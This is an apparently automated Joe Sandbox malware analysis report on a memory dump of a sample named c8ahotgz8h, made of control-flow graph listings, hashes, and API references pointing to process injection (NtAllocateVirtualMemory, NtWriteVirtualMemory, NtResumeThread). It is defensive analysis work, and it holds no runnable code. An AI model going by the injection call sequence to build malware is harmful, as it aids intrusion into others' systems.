1093->1090 1097 2331865-2331892 1093->1097 1096 2331e58-2331e6d 1094->1096 1095->944 1103 232bbe4-232bbfd call 2332acd 1095->1103 1100 2331e73-2331eac 1096->1100 1101 2332172-2332187 1096->1101 1097->1090 1102 2331894-23318aa 1097->1102 1100->1096 1105 2331eae-2331ec5 1100->1105 1101->1005 1107 233218d-233218e 1101->1107 1102->1090 1106 23318ac-2331920 1102->1106 1104->920 1114 2333097-23330ad 1104->1114 1105->1096 1110 2331ec7-2331f29 1105->1110 1117 2331922-233199c 1106->1117 1112 2332192-23321a1 1107->1112 1110->1096 1122 2331f2f-2331f46 1110->1122 1118 23321a7-2332219 1112->1118 1119 23323b6-23323dd call 23323e2 1112->1119 1114->920 1115 23330b3-23330ca 1114->1115 1115->920 1120 23330d0-2333102 1115->1120 1128 23319a2-23319e7 1117->1128 1129 2331a39-2331a4c 1117->1129 1118->1005 1130 233221f-233222a 1118->1130 1120->920 1131 2333108-2333161 1120->1131 1122->1005 1127 2331f4c-2331fb8 1122->1127 1137 2331fbd-2331fd1 1127->1137 1133 2331a69-2331a79 1128->1133 1129->1133 1134 2331a4e-2331a68 1129->1134 1130->1112 1135 2332230-2332244 1130->1135 1131->920 1142 2333163-233317d 1131->1142 1139 2331a7f-2331a96 1133->1139 1140 2331c2d-2331c44 1133->1140 1134->1133 1135->1112 1138 233224a-233227e 1135->1138 1145 23320a7-23320e0 1137->1145 1146 2331fd7-2331ff1 1137->1146 1138->1112 1147 2332284-23322f0 1138->1147 1139->1140 1141 2331a9c-2331b0e 1139->1141 1143 2331d64-2331da8 1140->1143 1144 2331c4a-2331cd0 1140->1144 1158 2331b0f-2331b3f 1141->1158 1142->920 1151 233317f-233318b call 233322b 1142->1151 1143->1117 1155 2331dae-2331dec call 23323e2 1143->1155 1144->1143 1161 2331cd6-2331d61 1144->1161 1145->1137 1150 23320e6-233216c call 23323e2 1145->1150 1153 2331ff3-233200a 1146->1153 1154 233201c-2332084 1146->1154 1157 23322f5-233230e 1147->1157 1168 2333190-23331ab NtResumeThread 1151->1168 1153->935 1162 2332010-233201a 1153->1162 1154->1145 1155->1072 1164 2332310-233237a 1157->1164 1165 233237b-23323ae 1157->1165 1158->1158 1166 2331b41-2331bdb 1158->1166 1161->1143 1162->1154 1170 2332088-23320a6 1162->1170 1164->1165 1165->1157 1173 23323b4 1165->1173 1166->1158 1178 2331be1-2331c20 1166->1178 1175 23331b0-23331b8 1168->1175 1170->1145 1173->1119 1175->1175 1177 23331ba-23331c6 1175->1177 1177->920 1178->1158 1179 2331c26-2331c2a 1178->1179 1179->1140
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H+m$U=b$}#c
                                                                                                                          • API String ID: 0-2772983987
                                                                                                                          • Opcode ID: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
                                                                                                                          • Instruction ID: 5987f0eba92561251bc34043356abb768109f1b219b81218c327621bec622b2f
                                                                                                                          • Opcode Fuzzy Hash: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
                                                                                                                          • Instruction Fuzzy Hash: 3282337160434A9FDF349E38CDA53EE77B2EF55390F95822ADC8A8B654D3308985CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1180 2332ad2-2332adc 1181 2332add-2332b37 1180->1181 1183 232138e-2321464 call 23337e8 1181->1183 1184 2332b3d-2332d65 1181->1184 1193 2321466-2321497 1183->1193 1194 23214dd-2321502 1183->1194 1184->1181 1202 2332d6b-2332de9 call 23306a2 1184->1202 1193->1180 1196 2321572-2321578 1194->1196 1197 2321517-2321518 1194->1197 1199 2321579-2321594 1196->1199 1197->1196 1199->1197 1201 2321596-23215a6 1199->1201 1203 23215b6-23215b9 1201->1203 1204 23215a9-23215b4 1201->1204 1210 2332dec-2332dff 1202->1210 1203->1199 1206 23215bb-23315f9 call 232f3ee * 2 call 23337e8 GetPEB call 23323e2 1203->1206 1204->1203 1230 2331df1-2331e3a 1206->1230 1231 23315ff-23316a1 1206->1231 1210->1210 1212 2332e01-2332e89 1210->1212 1216 2332e8c-2332f06 1212->1216 1220 2332f08-2332fe7 call 233322b 1216->1220 1232 2332fed-2333091 1220->1232 1233 23331cc-2333231 1220->1233 1231->1183 1238 23316a7-2331838 1231->1238 1232->1233 1239 2333097-23330ad 1232->1239 1245 2333237-2333269 1233->1245 1246 232a574-232a80f call 2331490 call 232a760 1233->1246 1251 233183c-233184d 1238->1251 1239->1233 1241 23330b3-23330ca 1239->1241 1241->1233 1244 23330d0-2333102 1241->1244 1244->1233 1252 2333108-2333161 1244->1252 1245->1233 1249 233326f-23332f4 1245->1249 1291 232a815-232a841 1246->1291 1292 232f3ee-232f4b1 1246->1292 1249->1233 1258 23332fa-233332c 1249->1258 1255 2331853-2331863 1251->1255 1256 2331e40-2331e54 1251->1256 1252->1233 1262 2333163-233317d 1252->1262 1255->1251 1261 2331865-2331892 1255->1261 1260 2331e58-2331e6d 1256->1260 1258->1233 1263 2333332-2333335 1258->1263 1265 2331e73-2331eac 1260->1265 1266 2332172-2332187 1260->1266 1261->1251 1267 2331894-23318aa 1261->1267 1262->1233 1268 233317f-23331ab call 233322b NtResumeThread 1262->1268 1265->1260 1270 2331eae-2331ec5 1265->1270 1266->1183 1273 233218d-233218e 1266->1273 1267->1251 1271 23318ac-2331920 1267->1271 1282 23331b0-23331b8 1268->1282 1270->1260 1275 2331ec7-2331f29 1270->1275 1281 2331922-233199c 1271->1281 1278 2332192-23321a1 1273->1278 1275->1260 1287 2331f2f-2331f46 1275->1287 1283 23321a7-2332219 1278->1283 1284 23323b6-23323dd call 23323e2 1278->1284 1297 23319a2-23319e7 1281->1297 1298 2331a39-2331a4c 1281->1298 1282->1282 1289 23331ba-23331c6 1282->1289 1283->1183 1299 233221f-233222a 1283->1299 1287->1183 1296 2331f4c-2331fb8 1287->1296 1289->1233 1293 2321320-232136d call 23210c0 1291->1293 1294 232a847-232a8fa 1291->1294 1307 232f4b3-232f4e1 call 232fcc1 call 232f542 1292->1307 1308 232f4e4-232f53d LoadLibraryA call 232f542 1292->1308 1310 232a900-232aac7 call 232f3ca call 2332acd 1294->1310 1311 233374d-2333755 1294->1311 1313 2331fbd-2331fd1 1296->1313 1303 2331a69-2331a79 1297->1303 1298->1303 1304 2331a4e-2331a68 1298->1304 1299->1278 1305 2332230-2332244 1299->1305 1315 2331a7f-2331a96 1303->1315 1316 2331c2d-2331c44 1303->1316 1304->1303 1305->1278 1314 233224a-233227e 1305->1314 1307->1308 1365 232bbfe-232bd48 call 2332acd * 3 1310->1365 1366 232aacd-232afd9 call 232f3ee call 2332acd call 232bd4b call 232f313 call 2332acd 1310->1366 1322 2333756-233378f 1311->1322 1326 23320a7-23320e0 1313->1326 1327 2331fd7-2331ff1 1313->1327 1314->1278 1328 2332284-23322f0 1314->1328 1315->1316 1318 2331a9c-2331b0e 1315->1318 1324 2331d64-2331da8 1316->1324 1325 2331c4a-2331cd0 1316->1325 1342 2331b0f-2331b3f 1318->1342 1322->1322 1334 2333791-23337e0 1322->1334 1324->1281 1339 2331dae-2331dec call 23323e2 1324->1339 1325->1324 1347 2331cd6-2331d61 1325->1347 1326->1313 1332 23320e6-233216c call 23323e2 1326->1332 1337 2331ff3-233200a 1327->1337 1338 233201c-2332084 1327->1338 1341 23322f5-233230e 1328->1341 1337->1293 1348 2332010-233201a 1337->1348 1338->1326 1339->1230 1350 2332310-233237a 1341->1350 1351 233237b-23323ae 1341->1351 1342->1342 1352 2331b41-2331bdb 1342->1352 1347->1324 1348->1338 1356 2332088-23320a6 1348->1356 1350->1351 1351->1341 1359 23323b4 1351->1359 1352->1342 1364 2331be1-2331c20 1352->1364 1356->1326 1359->1284 1364->1342 1368 2331c26-2331c2a 1364->1368 1365->1292 1366->1365 1394 232afdf-232b089 1366->1394 1368->1316 1394->1292 1396 232b08f-232b1e5 call 2332acd 1394->1396 1396->1293 1401 232b1eb-232b20b 1396->1401 1401->1365 1402 232b211-232b3f2 call 232b2fb 1401->1402 1402->1183 1408 232b3f8-232b554 call 2332acd 1402->1408 1408->1365 1413 232b55a-232b597 1408->1413 1413->1365 1414 232b59d-232b604 1413->1414 1416 232b641-232b64a 1414->1416 1417 232b606-232b63b 1414->1417 1416->1246 1418 232b650-232b66e 1416->1418 1417->1365 1417->1416 1418->1365 1419 232b674-232b68f 1418->1419 1419->1246 1420 232b695-232b8b7 call 232f944 1419->1420 1420->1365 1426 232b8bd-232b9ea call 233374d NtWriteVirtualMemory 1420->1426 1426->1365 1431 232b9f0-232baba call 2332acd 1426->1431 1431->1365 1435 232bac0-232bb82 call 2332acd 1431->1435 1435->1365 1439 232bb84-232bbde 1435->1439 1439->1311 1441 232bbe4-232bbfd call 2332acd 1439->1441
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: );J$EK]
                                                                                                                          • API String ID: 0-1158390361
                                                                                                                          • Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction ID: bddfee98e0631a0a8c14874ddf4d4ae8604b7cf324e3ccad2c32dc3847579ab2
                                                                                                                          • Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction Fuzzy Hash: CFB16A30A04349CFDF39AE34C9A43EA37A2EF55350F59815BCC8A8F655D7319A86CB41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1444 232c88b-232c8a0 1445 232c8a6-232c954 1444->1445 1446 232cbe8-232cd65 call 232f32f call 232cc7e 1444->1446 1450 232c95a-232ca12 call 232f3ee 1445->1450 1451 232f3ee-232f4b1 1445->1451 1446->1451 1466 232a574-232a80f call 2331490 call 232a760 1450->1466 1467 232ca18-232cae3 call 232ca93 1450->1467 1457 232f4b3-232f4e1 call 232fcc1 call 232f542 1451->1457 1458 232f4e4-232f4e9 LoadLibraryA 1451->1458 1457->1458 1460 232f533-232f53d call 232f542 1458->1460 1466->1451 1486 232a815-232a841 1466->1486 1467->1466 1479 232cae9-232cb18 1467->1479 1479->1466 1481 232cb1e-232cbe6 NtAllocateVirtualMemory 1479->1481 1481->1446 1487 2321320-232136d call 23210c0 1486->1487 1488 232a847-232a8fa 1486->1488 1491 232a900-232aac7 call 232f3ca call 2332acd 1488->1491 1492 233374d-2333755 1488->1492 1504 232bbfe-232bd48 call 2332acd * 3 1491->1504 1505 232aacd-232afd9 call 232f3ee call 2332acd call 232bd4b call 232f313 call 2332acd 1491->1505 1496 2333756-233378f 1492->1496 1496->1496 1498 2333791-23337e0 1496->1498 1504->1451 1505->1504 1532 232afdf-232b089 1505->1532 1532->1451 1534 232b08f-232b1e5 call 2332acd 1532->1534 1534->1487 1539 232b1eb-232b20b 1534->1539 1539->1504 1540 232b211-232b3f2 call 232b2fb 1539->1540 1546 232b3f8-232b554 call 2332acd 1540->1546 1547 232138e-2321464 call 23337e8 1540->1547 1546->1504 1558 232b55a-232b597 1546->1558 1556 2321466-2332adc 1547->1556 1557 23214dd-2321502 1547->1557 1564 2332add-2332b37 1556->1564 1560 2321572-2321578 1557->1560 1561 2321517-2321518 1557->1561 1558->1504 1562 232b59d-232b604 1558->1562 1565 2321579-2321594 1560->1565 1561->1560 1566 232b641-232b64a 1562->1566 1567 232b606-232b63b 1562->1567 1564->1547 1571 2332b3d-2332d65 1564->1571 1565->1561 1569 2321596-23215a6 1565->1569 1566->1466 1570 232b650-232b66e 1566->1570 1567->1504 1567->1566 1572 23215b6-23215b9 1569->1572 1573 23215a9-23215b4 1569->1573 1570->1504 1575 232b674-232b68f 1570->1575 1571->1564 1596 2332d6b-2332de9 call 23306a2 1571->1596 1572->1565 1574 23215bb-23315f9 call 232f3ee * 2 call 23337e8 GetPEB call 23323e2 1572->1574 1573->1572 1614 2331df1-2331e3a 1574->1614 1615 23315ff-23316a1 1574->1615 1575->1466 1577 232b695-232b8b7 call 232f944 1575->1577 1577->1504 1595 232b8bd-232b99b call 233374d NtWriteVirtualMemory 1577->1595 1608 232b9e1-232b9ea 1595->1608 1606 2332dec-2332dff 1596->1606 1606->1606 1610 2332e01-2332e89 1606->1610 1608->1504 1609 232b9f0-232baba call 2332acd 1608->1609 1609->1504 1624 232bac0-232bb82 call 2332acd 1609->1624 1618 2332e8c-2332f06 1610->1618 1615->1547 1622 23316a7-2331838 1615->1622 1625 2332f08-2332fe7 call 233322b 1618->1625 1632 233183c-233184d 1622->1632 1624->1504 1637 232bb84-232bbde 1624->1637 1646 2332fed-2333091 1625->1646 1647 23331cc-2333231 1625->1647 1635 2331853-2331863 1632->1635 1636 2331e40-2331e54 1632->1636 1635->1632 1639 2331865-2331892 1635->1639 1638 2331e58-2331e6d 1636->1638 1637->1492 1645 232bbe4-232bbfd call 2332acd 1637->1645 1642 2331e73-2331eac 1638->1642 1643 2332172-2332187 1638->1643 1639->1632 1644 2331894-23318aa 1639->1644 1642->1638 1648 2331eae-2331ec5 1642->1648 1643->1547 1650 233218d-233218e 1643->1650 1644->1632 1649 23318ac-2331920 1644->1649 1646->1647 1658 2333097-23330ad 1646->1658 1647->1466 1666 2333237-2333269 1647->1666 1648->1638 1654 2331ec7-2331f29 1648->1654 1662 2331922-233199c 1649->1662 1656 2332192-23321a1 1650->1656 1654->1638 1668 2331f2f-2331f46 1654->1668 1663 23321a7-2332219 1656->1663 1664 23323b6-23323dd call 23323e2 1656->1664 1658->1647 1659 23330b3-23330ca 1658->1659 1659->1647 1665 23330d0-2333102 1659->1665 1675 23319a2-23319e7 1662->1675 1676 2331a39-2331a4c 1662->1676 1663->1547 1677 233221f-233222a 1663->1677 1665->1647 1678 2333108-2333161 1665->1678 1666->1647 1672 233326f-23332f4 1666->1672 1668->1547 1674 2331f4c-2331fb8 1668->1674 1672->1647 1685 23332fa-233332c 1672->1685 1686 2331fbd-2331fd1 1674->1686 1681 2331a69-2331a79 1675->1681 1676->1681 1682 2331a4e-2331a68 1676->1682 1677->1656 1683 2332230-2332244 1677->1683 1678->1647 1691 2333163-233317d 1678->1691 1688 2331a7f-2331a96 1681->1688 1689 2331c2d-2331c44 1681->1689 1682->1681 1683->1656 1687 233224a-233227e 1683->1687 1685->1647 1692 2333332-2333335 1685->1692 1695 23320a7-23320e0 1686->1695 1696 2331fd7-2331ff1 1686->1696 1687->1656 1697 2332284-23322f0 1687->1697 1688->1689 1690 2331a9c-2331b0e 1688->1690 1693 2331d64-2331da8 1689->1693 1694 2331c4a-2331cd0 1689->1694 1708 2331b0f-2331b3f 1690->1708 1691->1647 1701 233317f-23331ab call 233322b NtResumeThread 1691->1701 1693->1662 1705 2331dae-2331dec call 23323e2 1693->1705 1694->1693 1711 2331cd6-2331d61 1694->1711 1695->1686 1700 23320e6-233216c call 23323e2 1695->1700 1703 2331ff3-233200a 1696->1703 1704 233201c-2332084 1696->1704 1707 23322f5-233230e 1697->1707 1725 23331b0-23331b8 1701->1725 1703->1487 1712 2332010-233201a 1703->1712 1704->1695 1705->1614 1714 2332310-233237a 1707->1714 1715 233237b-23323ae 1707->1715 1708->1708 1716 2331b41-2331bdb 1708->1716 1711->1693 1712->1704 1720 2332088-23320a6 1712->1720 1714->1715 1715->1707 1723 23323b4 1715->1723 1716->1708 1728 2331be1-2331c20 1716->1728 1720->1695 1723->1664 1725->1725 1727 23331ba-23331c6 1725->1727 1727->1647 1728->1708 1729 2331c26-2331c2a 1728->1729 1729->1689
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0232CBC8
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                          • String ID: U=b
                                                                                                                          • API String ID: 2616484454-117013522
                                                                                                                          • Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction ID: 17541803de5646156348f29870006c12b70813cb80c97c1629d47c5ca7687a0e
                                                                                                                          • Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction Fuzzy Hash: 2D819EB1A0036ADFCF349E688DA43EE36B7EF95390F94013ADC499B254D7318A46CB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1730 2331161-233117b 1731 2331181-23311be 1730->1731 1731->1731 1732 23311c0-2331213 1731->1732 1734 2331219-2331275 1732->1734 1735 232138e-2321464 call 23337e8 1732->1735 1734->1735 1740 233127b-23312ad 1734->1740 1744 2321466-2332adc 1735->1744 1745 23214dd-2321502 1735->1745 1742 23312b3-2331330 1740->1742 1743 232f3ee-232f4b1 1740->1743 1751 232f4b3-232f4e1 call 232fcc1 call 232f542 1743->1751 1752 232f4e4-232f53d LoadLibraryA call 232f542 1743->1752 1754 2332add-2332b37 1744->1754 1749 2321572-2321578 1745->1749 1750 2321517-2321518 1745->1750 1757 2321579-2321594 1749->1757 1750->1749 1751->1752 1754->1735 1763 2332b3d-2332d65 1754->1763 1757->1750 1761 2321596-23215a6 1757->1761 1765 23215b6-23215b9 1761->1765 1766 23215a9-23215b4 1761->1766 1763->1754 1782 2332d6b-2332de9 call 23306a2 1763->1782 1765->1757 1767 23215bb-23315f9 call 232f3ee * 2 call 23337e8 GetPEB call 23323e2 1765->1767 1766->1765 1794 2331df1-2331e3a 1767->1794 1795 23315ff-23316a1 1767->1795 1789 2332dec-2332dff 1782->1789 1789->1789 1791 2332e01-2332e89 1789->1791 1797 2332e8c-2332f06 1791->1797 1795->1735 1800 23316a7-2331838 1795->1800 1802 2332f08-2332fe7 call 233322b 1797->1802 1807 233183c-233184d 1800->1807 1817 2332fed-2333091 1802->1817 1818 23331cc-2333231 1802->1818 1809 2331853-2331863 1807->1809 1810 2331e40-2331e54 1807->1810 1809->1807 1812 2331865-2331892 1809->1812 1811 2331e58-2331e6d 1810->1811 1814 2331e73-2331eac 1811->1814 1815 2332172-2332187 1811->1815 1812->1807 1816 2331894-23318aa 1812->1816 1814->1811 1819 2331eae-2331ec5 1814->1819 1815->1735 1821 233218d-233218e 1815->1821 1816->1807 1820 23318ac-2331920 1816->1820 1817->1818 1827 2333097-23330ad 1817->1827 1835 2333237-2333269 1818->1835 1836 232a574-232a80f call 2331490 call 232a760 1818->1836 1819->1811 1824 2331ec7-2331f29 1819->1824 1831 2331922-233199c 1820->1831 1826 2332192-23321a1 1821->1826 1824->1811 1838 2331f2f-2331f46 1824->1838 1832 23321a7-2332219 1826->1832 1833 23323b6-23323dd call 23323e2 1826->1833 1827->1818 1828 23330b3-23330ca 1827->1828 1828->1818 1834 23330d0-2333102 1828->1834 1846 23319a2-23319e7 1831->1846 1847 2331a39-2331a4c 1831->1847 1832->1735 1848 233221f-233222a 1832->1848 1834->1818 1849 2333108-2333161 1834->1849 1835->1818 1842 233326f-23332f4 1835->1842 1836->1743 1910 232a815-232a841 1836->1910 1838->1735 1845 2331f4c-2331fb8 1838->1845 1842->1818 1857 23332fa-233332c 1842->1857 1859 2331fbd-2331fd1 1845->1859 1853 2331a69-2331a79 1846->1853 1847->1853 1854 2331a4e-2331a68 1847->1854 1848->1826 1855 2332230-2332244 1848->1855 1849->1818 1864 2333163-233317d 1849->1864 1861 2331a7f-2331a96 1853->1861 1862 2331c2d-2331c44 1853->1862 1854->1853 1855->1826 1860 233224a-233227e 1855->1860 1857->1818 1865 2333332-2333335 1857->1865 1869 23320a7-23320e0 1859->1869 1870 2331fd7-2331ff1 1859->1870 1860->1826 1871 2332284-23322f0 1860->1871 1861->1862 1863 2331a9c-2331b0e 1861->1863 1866 2331d64-2331da8 1862->1866 1867 2331c4a-2331cd0 1862->1867 1883 2331b0f-2331b3f 1863->1883 1864->1818 1875 233317f-23331ab call 233322b NtResumeThread 1864->1875 1866->1831 1880 2331dae-2331dec call 23323e2 1866->1880 1867->1866 1886 2331cd6-2331d61 1867->1886 1869->1859 1874 23320e6-233216c call 23323e2 1869->1874 1878 2331ff3-233200a 1870->1878 1879 233201c-2332084 1870->1879 1882 23322f5-233230e 1871->1882 1904 23331b0-23331b8 1875->1904 1888 2321320-232136d call 23210c0 1878->1888 1889 2332010-233201a 1878->1889 1879->1869 1880->1794 1891 2332310-233237a 1882->1891 1892 233237b-23323ae 1882->1892 1883->1883 1893 2331b41-2331bdb 1883->1893 1886->1866 1889->1879 1899 2332088-23320a6 1889->1899 1891->1892 1892->1882 1902 23323b4 1892->1902 1893->1883 1912 2331be1-2331c20 1893->1912 1899->1869 1902->1833 1904->1904 1909 23331ba-23331c6 1904->1909 1909->1818 1910->1888 1911 232a847-232a8fa 1910->1911 1915 232a900-232aac7 call 232f3ca call 2332acd 1911->1915 1916 233374d-2333755 1911->1916 1912->1883 1914 2331c26-2331c2a 1912->1914 1914->1862 1926 232bbfe-232bd48 call 2332acd * 3 1915->1926 1927 232aacd-232afd9 call 232f3ee call 2332acd call 232bd4b call 232f313 call 2332acd 1915->1927 1918 2333756-233378f 1916->1918 1918->1918 1920 2333791-23337e0 1918->1920 1926->1743 1927->1926 1954 232afdf-232b089 1927->1954 1954->1743 1956 232b08f-232b1e5 call 2332acd 1954->1956 1956->1888 1961 232b1eb-232b20b 1956->1961 1961->1926 1962 232b211-232b3f2 call 232b2fb 1961->1962 1962->1735 1968 232b3f8-232b554 call 2332acd 1962->1968 1968->1926 1973 232b55a-232b597 1968->1973 1973->1926 1974 232b59d-232b604 1973->1974 1976 232b641-232b64a 1974->1976 1977 232b606-232b63b 1974->1977 1976->1836 1978 232b650-232b66e 1976->1978 1977->1926 1977->1976 1978->1926 1979 232b674-232b68f 1978->1979 1979->1836 1980 232b695-232b8b7 call 232f944 1979->1980 1980->1926 1986 232b8bd-232b9ea call 233374d NtWriteVirtualMemory 1980->1986 1986->1926 1991 232b9f0-232baba call 2332acd 1986->1991 1991->1926 1995 232bac0-232bb82 call 2332acd 1991->1995 1995->1926 1999 232bb84-232bbde 1995->1999 1999->1916 2001 232bbe4-232bbfd call 2332acd 1999->2001
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EK]
                                                                                                                          • API String ID: 0-1532622298
                                                                                                                          • Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction ID: 6543cb1276ae5525a561991f300da7e25930ca315ebd69f690bbd8d6d85f5a31
                                                                                                                          • Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction Fuzzy Hash: 7B61BC716003499FDF359E748AA43DB37AAEF967A0F65441ECC8ACBA01D771C986CB01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2004 232ffed-232fff4 call 2330391 2007 232fffa-233008e 2004->2007 2009 2330090-233013c call 23302dc 2007->2009 2013 233013e-233014a 2009->2013 2014 233014c-23301d8 2009->2014 2013->2014 2014->2009 2016 23301de-23301ea 2014->2016 2016->2007 2017 23301f0-2330231 2016->2017 2018 2330237-2330243 2017->2018 2019 232f3ee-232f4b1 2017->2019 2018->2007 2020 2330249-2330280 2018->2020 2023 232f4b3-232f4e1 call 232fcc1 call 232f542 2019->2023 2024 232f4e4-232f53d LoadLibraryA call 232f542 2019->2024 2020->2007 2022 2330286-23302d8 2020->2022 2023->2024
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-1850852036
                                                                                                                          • Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction ID: d7ed090f3b89347d559488d892903409a0cf83add06a1203499ca25788f30db6
                                                                                                                          • Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction Fuzzy Hash: CD51907660076ADFCF345E294E683DA33B7EFA13A0FDA402ACC4997501C7744A45CB41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2153 23323e2-23324f9 NtProtectVirtualMemory
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,023315C1,12BC0BD0,0232A728), ref: 023324F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction ID: bf3b49c468ab4515d5eefb8f45521d9ee39f12cbd0b830d06bfa1a1553660622
                                                                                                                          • Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction Fuzzy Hash: D1017CB46043A98FDF30CE68C8D87DA7695FB8D700F81412AAD4DAB305C6715E8ACB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2033 232bf1c-232bfcc call 232bf5c 2038 232bfd2-232c025 call 232c88b call 232ebec 2033->2038 2039 232f3ee-232f4b1 2033->2039 2054 232e546-232e553 call 232c02c 2038->2054 2043 232f4b3-232f4e1 call 232fcc1 call 232f542 2039->2043 2044 232f4e4-232f53d LoadLibraryA call 232f542 2039->2044 2043->2044 2059 232e555 2054->2059 2060 232e51e-232e520 2054->2060 2059->2039 2063 232e518 2059->2063 2061 232e522 2060->2061 2062 232e4bf-232e4c0 2060->2062 2061->2054 2064 232e4a2 2062->2064 2065 232e4c2-232e4c4 2062->2065 2063->2054 2068 232e4a9-232e4ae 2064->2068 2066 232e463 2065->2066 2067 232e4c6 2065->2067 2066->2068 2069 232e4f0-232e509 call 232c7b8 2067->2069 2068->2069 2069->2063
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction ID: 2a8adc6f0b03fac218770f70367ab622f4323f77cfcf711a164981aeb45cd085
